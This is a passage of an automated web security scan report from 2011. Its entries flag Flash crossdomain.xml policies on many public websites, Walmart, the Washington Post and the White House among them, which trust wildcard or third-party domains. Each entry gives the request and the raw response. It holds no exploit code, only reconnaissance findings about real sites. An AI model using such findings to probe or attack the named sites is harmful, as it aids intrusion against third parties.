Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.walletpop.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.walletpop.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 14:19:28 GMT
Server: Apache/2.2
Accept-Ranges: bytes
Content-Length: 318
Keep-Alive: timeout=5, max=999968
Connection: Keep-Alive
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.aol.com" />
<allow-access-from domain="*.blogsmithmedia.com" />
<allow-access-from domain="*.unicast.com" />
...[SNIP]...
7.474. http://www.walmart.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.walmart.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.walmart.com

Response

HTTP/1.0 200 OK
Server: Apache/2.2.15
Last-Modified: Fri, 19 Jun 2009 00:03:46 GMT
ETag: "bf53-137-46ca84217bc80"
Cache-Control: max-age=7200
Expires: Sat, 02 Apr 2011 14:37:43 GMT
Content-Type: application/xml
Date: Sat, 02 Apr 2011 12:37:43 GMT
Content-Length: 311
Connection: close
Set-Cookie: NSC_xxx.xbmnbsu.dpn-mc=ffffffff0907979345525d5f4f58455e445a4a423660;path=/
Set-Cookie: SSLB=0; path=/; domain=.walmart.com

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.walmart.com" />
<allow-access-from domain="*.richfx.com" />
<allow-access-from domain="*.edgesuite.net" />
...[SNIP]...
7.475. http://www.warnerbros.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.warnerbros.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.warnerbros.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:32:01 GMT
Server: Apache
X-WBOL-WebServer: www_us
Set-cookie: WBWTID=173.193.214.243-4D972551141000006BF1F2D-www-wb-web05; path=/; expires=Friday, 01-Jan-10 12:00:00 GMT; domain=.warnerbros.com;
Last-Modified: Mon, 06 Jul 2009 20:39:06 GMT
ETag: "6174a7-16a-7f4a8e80"
Accept-Ranges: bytes
Content-Length: 362
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<cross-domain-policy>
   <site-control permitted-cross-domain-policies="all"/>
   <allow-access-from domain="*.warnerbros.com" />
   <allow-access-from domain="*.telepixtv.net" />
   <allow-access-from domain="*.telepixtv.com" />
   <allow-access-from domain="*.bunchball.com" />
   <allow-access-from domain="*.bunchball.net" />
...[SNIP]...
7.476. http://www.washingtonpost.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.washingtonpost.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.washingtonpost.com

Response

HTTP/1.0 200 OK
Server: Apache-Coyote/1.1
Last-Modified: Sun, 06 Feb 2011 23:42:57 GMT
Content-Type: application/xml
Content-Length: 478
X-Cnection: close
Cache-Control: must-revalidate, max-age=4
Date: Sat, 02 Apr 2011 12:43:09 GMT
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.washingtonpost.com"/>
<allow-access-from domain="admin.brightcove.com"/>
<allow-access-from domain="*.newsweek.com"/>
<allow-access-from domain="*.digitalink.com"/>
<allow-access-from domain="*.slate.com"/>
<allow-access-from domain="livingstories.googlelabs.com"/>
...[SNIP]...
7.477. http://www.weather.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.weather.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.weather.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 12:37:29 GMT
Content-Type: text/xml
Accept-Ranges: bytes
Server: Apache
SVRNAME: web3x03
Vary: Accept-Encoding
Content-Length: 2010
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.weather.com" />
<allow-access-from domain="*.epicmashup.com" />
<allow-access-from domain="showcase.weather.com" />
<allow-access-from domain="*.chumby.com" />
<allow-access-from domain="*.imwx.com" />
<allow-access-from domain="*.rga.com" />
<allow-access-from domain="*.jnj.com" />

<allow-access-from domain="*.zyrtec.com" />
<allow-access-from domain="*.amazonaws.com" />
<allow-access-from domain="*.gigyahosting.com" />
<allow-access-from domain="*.gigyahosting1.com" />
<allow-access-from domain="media.pointroll.com" />
<allow-access-from domain="www.pointroll.com" />
<allow-access-from domain="data.pointroll.com" />
<allow-access-from domain="speed.pointroll.com" />
<allow-access-from domain="mirror.pointroll.com" />
<allow-access-from domain="adportal.pointroll.com" />
<allow-access-from domain="*.ge.com" />
<allow-access-from domain="widgets.nbcuni.com" />
<allow-access-from domain="*.ivillage.com" />
<allow-access-from domain="devworks.ivillage.com" />
<allow-access-from domain="devi.ivillage.com" />
<allow-access-from domain="i.ivillage.com" />
<allow-access-from domain="www.ivillage.com" />
<allow-access-from domain="msnbcmedia.msn.com" />
<allow-access-from domain="*.tvpdigital.com" />
<allow-access-from domain="*.brightcove.com" />
<allow-access-from domain="apps.eyewonderlabs.com" />
<allow-access-from domain="*.eyewonder.com" />
<allow-access-from domain="fjpecvaa.joyent.us" />
<allow-access-from domain="widget.bravotv.com" />
<allow-access-from domain="*.jwtdev.com" />
<allow-access-from domain="*.jwtweb.com" />
<allow-access-from domain="*.na.jnj.com" />
<allow-access-from domain="*2mdn.net" />
<allow-access-from domain="*.googlesyndication.com" />
...[SNIP]...
7.478. http://www.webshots.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.webshots.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.webshots.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:28:05 GMT
Server: Resin/3.0.23
ETag: "Hn4QveNaujs"
Last-Modified: Thu, 17 Mar 2011 13:19:16 GMT
Set-Cookie: AB_ID=2985706610117927138; domain=.webshots.com; path=/; expires=Fri, 28-Mar-2031 13:28:19 GMT
Set-Cookie: session_source=webs; domain=.webshots.com; path=/
Content-Type: text/xml
Content-Length: 419
Set-Cookie: NSC_ed3-xt-bqq-cbdlfoe-mc=e24d345029a0;path=/
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
   SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <allow-http-request-headers-from domain="*" headers="*" sec
...[SNIP]...
<allow-access-from domain="*.webshots.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.webshots.net" secure="false" />
...[SNIP]...
<allow-access-from domain="*.imgag.com" secure="false" />
...[SNIP]...
7.479. http://www.weightwatchers.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.weightwatchers.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.weightwatchers.com

Response

HTTP/1.1 200 OK
Cache-Control: max-age=1209600
Content-Length: 285
Content-Type: text/xml
Last-Modified: Tue, 22 Dec 2009 11:25:24 GMT
Accept-Ranges: bytes
ETag: "0ea1c74f982ca1:247"
CP: CAO DSP CURa ADMa DEVa TAIa PSAa IVAa CONi OTPa OUR SAMa STP PHY ONL UNI PUR FIN COM NAV INT DEM CNT PRE
X-Powered-By: ASP.NET
Date: Sat, 02 Apr 2011 13:36:38 GMT
Connection: close

<?xml version="1.0" encoding="iso-8859-1"?>

<cross-domain-policy>
   <site-control permitted-cross-domain-policies="all" />
   <allow-access-from domain="*.weightwatchers.com" />
   <allow-http-reques
...[SNIP]...
7.480. http://www.wetpaint.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.wetpaint.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.wetpaint.com

Response

HTTP/1.1 200 OK
Age: 0
Content-Type: application/xml
Date: Sat, 02 Apr 2011 13:58:41 GMT
Last-Modified: Fri, 14 May 2010 18:42:05 GMT
Server: prod7
Vary: Accept-Encoding
X-Cache: MISS
Content-Length: 247
Connection: Close

<?xml version="1.0" encoding="UTF-8"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.cooliris.com" secure="false"/>
...[SNIP]...
7.481. http://www.whitehouse.gov/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.whitehouse.gov
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.whitehouse.gov

Response

HTTP/1.0 200 OK
Last-Modified: Wed, 30 Mar 2011 23:01:41 GMT
Content-Type: text/xml
Cache-Control: max-age=275
Expires: Sat, 02 Apr 2011 13:54:56 GMT
Date: Sat, 02 Apr 2011 13:50:21 GMT
Content-Length: 399
Connection: close
Server: White House
P3P: CP="NON DSP COR ADM DEV IVA OTPi OUR LEG"

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM
"http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>
   <site-control permitted-cross-domain-policies="master-o
...[SNIP]...
<allow-access-from domain="stage-creative.myspacecdn.com"/>
   <allow-access-from domain="creative.myspacecdn.com"/>
   <allow-access-from domain="*.myspacecdn.com"/>
...[SNIP]...
7.482. http://www.wimp.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.wimp.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.wimp.com

Response

HTTP/1.0 200 OK
Content-Type: text/xml
Accept-Ranges: bytes
ETag: "795047349"
Last-Modified: Wed, 29 Apr 2009 18:43:54 GMT
Content-Length: 154
Connection: close
Date: Sat, 02 Apr 2011 13:26:05 GMT
Server: lighttpd/1.4.28

<?xml version="1.0"?>
<!-- http://www.foo.com/crossdomain.xml -->
<cross-domain-policy>
<allow-access-from domain="*.wimp.com" />
</cross-domain-policy>
7.483. http://www.wn.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.wn.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.wn.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:38:49 GMT
Server: Apache/2.2.16 (Debian)
Last-Modified: Mon, 22 Jan 2007 20:02:38 GMT
ETag: "305856-101-427a68b105380"
Accept-Ranges: bytes
Content-Length: 257
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.wn.com" />
<allow-access-from domain="*.worldnews.com" />
...[SNIP]...
7.484. http://www.womansday.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.womansday.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.womansday.com

Response

HTTP/1.0 200 OK
Last-Modified: Thu, 10 Sep 2009 09:12:36 GMT
Accept-Ranges: bytes
Content-Length: 224
Content-Type: application/xml
Date: Sat, 02 Apr 2011 14:04:47 GMT
Connection: close

<?xml version="1.0" encoding="utf-8"?>
<cross-domain-policy>

<allow-access-from domain="*.hfmus.com" />
<allow-access-from domain="hfm.checkm8.com" />
<allow-access-from domain="*.womansday.com" />


...[SNIP]...
7.485. http://www.worldwinner.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.worldwinner.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.worldwinner.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:53:16 GMT
Server: Apache
Last-Modified: Mon, 20 Oct 2003 15:12:42 GMT
Accept-Ranges: bytes
Content-Length: 388
Vary: Accept-Encoding,User-Agent
P3P: CP="NOI DSP COR NID TAIi OUR NOR CNT", CP="NOI DSP COR NID TAIi OUR NOR CNT"
Content-Type: text/xml
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">

<!--
allows flash player 7 to post within worldwinner [flash solitaire:
...[SNIP]...
<allow-access-from domain='*.worldwinner.com' />
...[SNIP]...
7.486. http://www.wsbtv.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.wsbtv.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.wsbtv.com

Response

HTTP/1.0 200 OK
Server: Apache/2.2.3 (CentOS)
X-IBS-CCDS-VERSION: 2.16.16
X-IBS-CCDS-ORIGIN: origin131
Accept-Ranges: bytes
Content-Length: 132
Content-Type: text/xml
Cache-Control: max-age=60671
Expires: Sun, 03 Apr 2011 06:41:45 GMT
Date: Sat, 02 Apr 2011 13:50:34 GMT
Connection: close
Set-Cookie: alpha=47ce8f18567b0000aa29974d2ae80100802b0000; expires=Tue, 30-Mar-2021 13:50:34 GMT; path=/; domain=.wsbtv.com

<?xml version="1.0" encoding="utf-8"?>
<cross-domain-policy>
<allow-access-from domain="*.wsbtv.com" />
</cross-domain-policy>
7.487. http://www.wwe.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.wwe.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.wwe.com

Response

HTTP/1.0 200 OK
Last-Modified: Wed, 23 Mar 2011 21:35:31 GMT
ETag: "69991f7-1d5-49f2d23deeec0"
Server: Apache/2.2.17
X-App: p5tyr2
Content-Type: application/xml
X-Varnish: 1285448186
X-CacheTyr-Server: p5tyr2
X-CacheTyr: MISS
Content-Length: 469
X-CacheKyte-Server: p5kyte7
X-CacheKyte: HIT
X-CacheKyte-Hits: 1
Cache-Control: public, max-age=8077
Date: Sat, 02 Apr 2011 13:39:42 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="localhost" />
<allow-access-from domain="*.wwe.com" />
<allow-access-from domain="*.wrestlemania25.com"/>
<allow-access-from domain="*.wwekids.com"/>
<allow-access-from domain="wwe.mylaunchpad.com.my"/>
<allow-access-from domain="*.brightcove.com"/>
...[SNIP]...
7.488. http://www.yallwire.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.yallwire.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.yallwire.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:40:51 GMT
Server: Apache/2.2.16 (Unix)
Vary: Accept-Encoding
Content-Length: 526
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.blastro.com" />
<allow-access-from domain="*.roxwel.com" />
<allow-access-from domain="*.yallwire.com" />
<allow-access-from domain="*.brightcove.com" />
<allow-access-from domain="*.googlesyndication.com" />
<allow-access-from domain="*.adxcel.com"/>
<allow-access-from domain="*.dev.adxcel.com"/>
...[SNIP]...
7.489. http://www.yellowpages.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.yellowpages.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.yellowpages.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 12:43:07 GMT
Status: 200 OK
Connection: close
Server: nginx
Content-Type: text/xml
Content-Length: 356
Last-Modified: Fri, 01 Apr 2011 18:25:22 GMT
Expires: Sat, 02 Apr 2011 12:43:06 GMT
Cache-Control: no-cache
Accept-Ranges: bytes
Set-Cookie: b=10010; domain=.yellowpages.com; path=/; expires=Thu, 20 Dec 2012 00:00:01 GMT

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.yellowpages.com" />
<allow-access-from domain="yellowpages.com" />
<allow-access-from domain="*.ypcdn.com" />
<allow-access-from domain="localhost" />
...[SNIP]...
7.490. http://www.yontoo.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.yontoo.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.yontoo.com

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Thu, 31 Mar 2011 18:22:44 GMT
Accept-Ranges: bytes
ETag: "70f545a1d0efcb1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET 2x8
Date: Sat, 02 Apr 2011 13:33:19 GMT
Connection: close
Content-Length: 274

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <site-control permitted-cross-domain-policies="master-only
...[SNIP]...
<allow-access-from domain="*.pagerage.com"/>
...[SNIP]...
7.491. http://www.zap2it.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.zap2it.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.zap2it.com

Response

HTTP/1.0 200 OK
Server: Sun-ONE-Web-Server/6.1
Content-Length: 265
Content-Type: text/xml
Last-Modified: Fri, 18 Jun 2010 02:41:30 GMT
ETag: "109-4c1adcda"
Accept-Ranges: bytes
Date: Sat, 02 Apr 2011 13:37:20 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM
"http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.cooliris.com" secure="false" />
...[SNIP]...
7.492. http://www.zappos.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.zappos.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.zappos.com

Response

HTTP/1.0 200 OK
Server: nginx/0.9.4
Content-Type: application/xml
Last-Modified: Thu, 31 Mar 2011 18:07:44 GMT
Content-Length: 236
X-Core-Value: 6. Build Open and Honest Relationships With Communication
X-Recruiting: If you're reading this, maybe you should be working at Zappos instead. Check out jobs.zappos.com
X-UUID: 6ec4abb8-5bda-11e0-9784-00215e22e1de
Date: Sat, 02 Apr 2011 13:31:01 GMT
Connection: close

<?xml version="1.0"?><cross-domain-policy><allow-access-from domain="overlay.tv" secure="false"/><allow-access-from domain="*.overlay.tv" secure="false"/><allow-access-from domain="*.cooliris.com" secure="false"/>
...[SNIP]...
7.493. http://www.zazzle.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.zazzle.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.zazzle.com

Response

HTTP/1.1 200 OK
Cache-Control: max-age=31536000
Content-Type: text/xml
Last-Modified: Mon, 08 Nov 2010 08:13:34 GMT
Accept-Ranges: bytes
ETag: "328bbdd61c7fcb1:0"
Server: Microsoft-IIS/7.5
Date: Sat, 02 Apr 2011 13:35:14 GMT
Connection: keep-alive
Content-Length: 894

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <site-control permitted-cross-domain-policies="master-only
...[SNIP]...
<allow-access-from domain="*.zazzle.com" />
   <allow-access-from domain="*.zazzle.co.uk" />
   <allow-access-from domain="*.zazzle.com.au" />
<allow-access-from domain="*.zazzle.ca" />
<allow-access-from domain="*.zazzle.co.nz" />
<allow-access-from domain="*.zazzle.de" />
<allow-access-from domain="*.zazzle.pt" />
<allow-access-from domain="*.zazzle.com.br" />
<allow-access-from domain="*.zazzle.es" />
<allow-access-from domain="*.zazzle.fr" />
<allow-access-from domain="*.zazzle.co.jp" />
<allow-access-from domain="*.zcache.com" />
   <allow-access-from domain="*.myspace.com" />
   <allow-access-from domain="*.myspacecdn.com" />
...[SNIP]...
7.494. http://www.zmags.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.zmags.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.zmags.com

Response

HTTP/1.0 200 OK
Last-Modified: Wed, 03 Nov 2010 14:17:20 GMT
ETag: "45241c8-143-49426b3059c00"
Server: Apache
Accept-Ranges: bytes
Content-Length: 323
Content-Type: text/xml
Cache-Control: max-age=1044180
Expires: Thu, 14 Apr 2011 16:06:24 GMT
Date: Sat, 02 Apr 2011 14:03:24 GMT
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<cross-domain-policy xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:noNamespaceSchemaLocation="http://www.adobe.com/xml/schemas/PolicyFile.xsd">
   <allow-access-from domain="*.zmags.com"/>
...[SNIP]...
7.495. http://www.zshare.net/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.zshare.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.zshare.net

Response

HTTP/1.0 200 OK
